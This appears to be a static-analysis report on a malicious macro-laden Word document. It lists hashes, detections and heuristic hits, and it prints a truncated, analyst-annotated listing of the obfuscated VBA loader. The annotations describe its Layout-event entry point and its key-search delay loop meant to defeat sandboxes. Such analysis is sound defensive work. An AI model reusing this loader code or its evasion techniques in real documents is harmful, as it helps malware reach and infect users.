Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a0111977c79f4eb3…

MALICIOUS

Office (OLE)

Size: 117.0 KB · Created: 2018-09-24 11:06:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-16
MD5: 49a64838968e596db7b80d5cbbe025c4 SHA-1: 5973a9faa1975f80540d7954d24b5936ab2b95d2 SHA-256: a0111977c79f4eb30511f22055b54e4e973c0501240f3ba462691b1b4999d561
Risk Score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic and the macros.bas artifact extracted from it. GetObject and CallByName are commonly used by malicious VBA macros to obtain a COM object and invoke its members by name, so that the code actually being run is never spelled out statically. The ClamAV detection further confirms its malicious nature. The VBA code is obfuscated (meaningless identifiers, byte tables filled through a lookup array, constants hidden behind arithmetic), but its structure suggests it is designed to download and execute a secondary payload.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 41166 bytes
SHA-256: f1f35bca24c9cb1da20cbfb2149b6f964805a346f0d474d8fa48615570e8980c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "sub1, 0, 0, MSForms, Frame"
' Analyst notes on the decoded olevba output. All "letNN" identifiers are auto-generated
' obfuscation names and carry no meaning.
' The VB_Control attribute above declares an MSForms Frame named "sub1" on ThisDocument. The
' only entry point visible in this listing is Sub1_Layout, i.e. that control's Layout event;
' there is no AutoOpen/Document_Open, so a detection rule keyed only on the classic auto-exec
' procedure names would miss how this macro starts.
' Module-level state: let2 has no "As" clause and is therefore a Variant, used as a run-once
' flag by Sub1_Layout. Every other name is a Byte array that is filled at run time by a
' table-building sub (let04 -> let10, let29 -> let95, let96 -> let49, ...). let62(1 To 255) is
' set to the identity mapping in let41 before those subs run, so a let62(n) lookup is just the
' value n -- unless let02 or let14 (called from let41 but not in view) remap it; verify before
' decoding the tables by hand.
Dim let2, let95(2) As Byte, let60(9) As Byte, let49(32) As Byte, let22(19) As Byte, let52(13) As Byte, let9(6) As Byte, let65(55) As Byte, let25(1269) As Byte, let63(5) As Byte, let10(38) As Byte, let75(38) As Byte, let62(1 To 255) As Byte
Private Sub let29()
' Fills the 3-byte table let95(0..2) through let62 lookups. The out-of-order writes are
' cosmetic obfuscation. With let62 as the identity map built in let41 the raw values would be
' 17, 71, 110, but let02/let14 (not in view) may alter let62 first -- do not decode from this alone.
let95(2) = let62(110)
let95(0) = let62(17)
let95(1) = let62(71)
End Sub
Private Function let99(let84)
' Splits a numeric value into a 2-byte little-endian pair: element 0 = low byte, element 1 = high byte.
' The thresholds are hidden behind arithmetic: 409020/1604 = 255, -9458+9714 = 256, 1694464/6619 = 256.
' let7 is not in view -- presumably a modulo helper (let84 Mod 256), to be confirmed.
' Note that VBA "/" is floating-point division, so let53 is rounded (not truncated) when it is
' stored into the Byte array; for inputs whose quotient has a fraction >= .5 the "high byte" is one
' too large. Whether that is intended cannot be told from here.
' When let84 <= 255 let61 is never assigned and stays Empty, which becomes 0 in let37(1).
Dim let37(1) As Byte, let05, let61, let53
If let84 > (409020 / 1604) Then
let05 = let7(let84, (-9458 + 9714))
let53 = let84 / (1694464 / 6619)
let61 = let53
Else
let05 = let84
End If
let37(0) = let05
let37(1) = let61
let99 = let37
End Function
Private Function let31(let34)
' Returns the highest valid index of the array let34 by reading let34(0), let34(1), ... until a
' subscript-out-of-range error fires; the On Error handler then reports let50 - 1.
' Functionally a UBound() substitute written to avoid the obvious keyword (obfuscation).
' let50 starts Empty, which VBA treats as 0 in let34(let50); an empty array therefore yields -1.
On Error GoTo let98
Dim let50, let30
Do
let30 = let34(let50)
let50 = let50 + 1
Loop
let98:
let31 = let50 - 1
End Function
Private Function let15(let94, let33, let5, let6, let3, let88)
' Late-bound member invocation: CallByName(object let94, member name let33, call type let5, argument let3).
' Only four of the six parameters are used; let6 and let88 are never referenced (decoy parameters).
' The empty let01 handler swallows every failure, so the caller cannot distinguish "call failed"
' from "returned Nothing". This is the OLE_VBA_CALLBYNAME heuristic hit: the member name arrives as
' run-time data, so the invoked functionality is not visible statically.
On Error GoTo let01
Set let15 = CallByName(let94, let33, let5, let3)
let01:
End Function
Private Sub Sub1_Layout()
' Layout event handler of the Frame control "sub1" declared in the VB_Control attribute -- the
' macro's effective entry point; it fires when the embedded form is laid out, with no
' AutoOpen/Document_Open procedure involved.
' let2 is a Variant (Empty compares equal to 0 on the first run) used as a run-once gate: after
' the first call it is set to 21 and the main routine let41 is never re-entered.
If let2 = 0 Then
let2 = 21
let41
End If
End Sub
Private Sub let04()
' Fills the 39-byte table let10(0..38) through let62 lookups; the scrambled write order is cosmetic.
' Index 22 is not assigned in this sub and therefore stays 0 unless written elsewhere (not in view).
' With let62 as the identity map from let41 the values are simply the literal let62 arguments.
' let41 later feeds let10 to let51/let77 and compares the result against let75 (the key check), so
' this is presumably encoded data whose key is recovered at run time rather than plaintext.
let10(15) = let62(112)
let10(26) = let62(7)
let10(34) = let62(158)
let10(36) = let62(90)
let10(5) = let62(229)
let10(16) = let62(226)
let10(27) = let62(64)
let10(20) = let62(207)
let10(28) = let62(39)
let10(8) = let62(88)
let10(32) = let62(16)
let10(7) = let62(171)
let10(17) = let62(13)
let10(37) = let62(162)
let10(4) = let62(206)
let10(38) = let62(172)
let10(35) = let62(133)
let10(12) = let62(113)
let10(1) = let62(102)
let10(2) = let62(43)
let10(30) = let62(93)
let10(11) = let62(106)
let10(25) = let62(97)
let10(9) = let62(157)
let10(0) = let62(19)
let10(6) = let62(53)
let10(24) = let62(253)
let10(19) = let62(153)
let10(21) = let62(113)
let10(29) = let62(65)
let10(10) = let62(225)
let10(14) = let62(150)
let10(31) = let62(23)
let10(23) = let62(47)
let10(13) = let62(75)
let10(3) = let62(100)
let10(18) = let62(130)
let10(33) = let62(191)
End Sub
Private Function let59(let42)
' GetObject wrapper (OLE_VBA_GETOBJ heuristic). The argument let42 is produced at run time by the
' caller (not in view), so the object or moniker it resolves is not statically visible here; the
' dynamic call has to be observed in a sandbox or recovered by decoding the byte tables.
Set let59 = GetObject(let42)
End Function
Private Function let86(let08() As Byte, let69() As Byte, let90)
' Byte-array equality over indices 0..let90 inclusive (let90 + 1 bytes, not let90): returns 1 when
' every position matches, 0 otherwise. There is no early exit on a mismatch -- the full range is
' always scanned. Any run-time error (e.g. an index past either array's bounds) lands in let91 and
' also returns 0, so "not comparable" and "different" are indistinguishable to the caller.
Dim let89, let92
On Error GoTo let91
let92 = 1
let89 = 0
While let89 <= let90
If let08(let89) <> let69(let89) Then
let92 = 0
End If
let89 = let89 + 1
Wend
let86 = let92
Exit Function
let91:
let86 = 0
End Function
Private Function let41()
' Main routine, reached once from Sub1_Layout. Phases visible here:
'  1. let62(1..255) := identity map (upper bound -2515 + 2770 = 255), then let02 / let04 / let14
'     fill the byte tables (let02 and let14 are not in view). let24 = 1522432/5947 = 256.
'  2. Key search: let39 counts 0, 1, 2, ... (Empty + 1 = 1 on the first pass). Assigning
'     CStr(let39) to the Byte array let83 yields the UTF-16LE bytes of the decimal string, and let31
'     returns its last index; each low/high byte pair let83(2k) + let83(2k+1) * 256 -- one digit
'     character -- is stored into let9(2..6). Five slots means at most a 5-digit counter is used.
'  3. Each iteration compares let51(let10(), let77(let9()), 38) with let75 over 39 bytes via let86.
'     let51 and let77 are not in view; presumably they transform let10 using the digits in let9.
'     On a match let68 := 3356, the loop ends and the next stage let19 (not in view) runs.
' There is no iteration cap: if no key ever matches, the loop never terminates. The Else branch
' (MsgBox let68) is unreachable, because 3356 is the only non-zero value ever assigned to let68.
' Defender note: the counting loop both delays execution and keeps the real key out of the static
' file, so a sandbox with a short time budget may never reach let19; instrument the success path of
' let86 or emulate the loop instead of waiting for it.
Dim let39, let68, let40, let83() As Byte, let24, let06
let06 = 1
While let06 <= (-2515 + 2770)
let62(let06) = let06
let06 = let06 + 1
Wend
let02
let04
let24 = (1522432 / 5947)
let14
While let68 = 0
let83 = CStr(let39)
let40 = let31(let83())
If let40 >= 1 Then
let9(2) = let83(0) + (let83(1) * let24)
If let40 >= 3 Then
let9(3) = let83(2) + (let83(3) * let24)
If let40 >= 5 Then
let9(4) = let83(4) + (let83(5) * let24)
If let40 >= 7 Then
let9(5) = let83(6) + (let83(7) * let24)
If let40 >= 9 Then
let9(6) = let83(8) + (let83(9) * let24)
End If
End If
End If
End If
End If
If let86(let51(let10(), let77(let9()), 38), let75, 38) = 1 Then
let68 = 3356
End If
let39 = let39 + 1
Wend
If let68 = 3356 Then
let19
Else
MsgBox let68
End If
End Function
Private Sub let96()
let49(22) = let62(91)
let49(13) = let62(83)
let49(23) = let62(88)
let49(21) = let62(93)
let49(32) = let62(34)
let49(0) = let62(33)
let49(15) = let62(33)
let49(7) = let62(236)
let49(29) = let62(103)
let49(6) = let62(112)
let49(11) = let62(51)
let49(1) = let62(75)
let49(31) = let62(80)
let49(10) = let62(205)
let49(16) = let62(203)
let49(20) = let62(218)
let49(19) = let62(224)
let49(27) = let62(10)
let49(14) = let62(193)
let49(12) = let62(52)
let49(9) = let62(173)
let49(2) = let62(116)
let49(8) = let62(83)
let49(5) = let62(186)
let49(4) = let62(237)
let49(24) = let62(139)
let49(25) = let62(6)
... (truncated)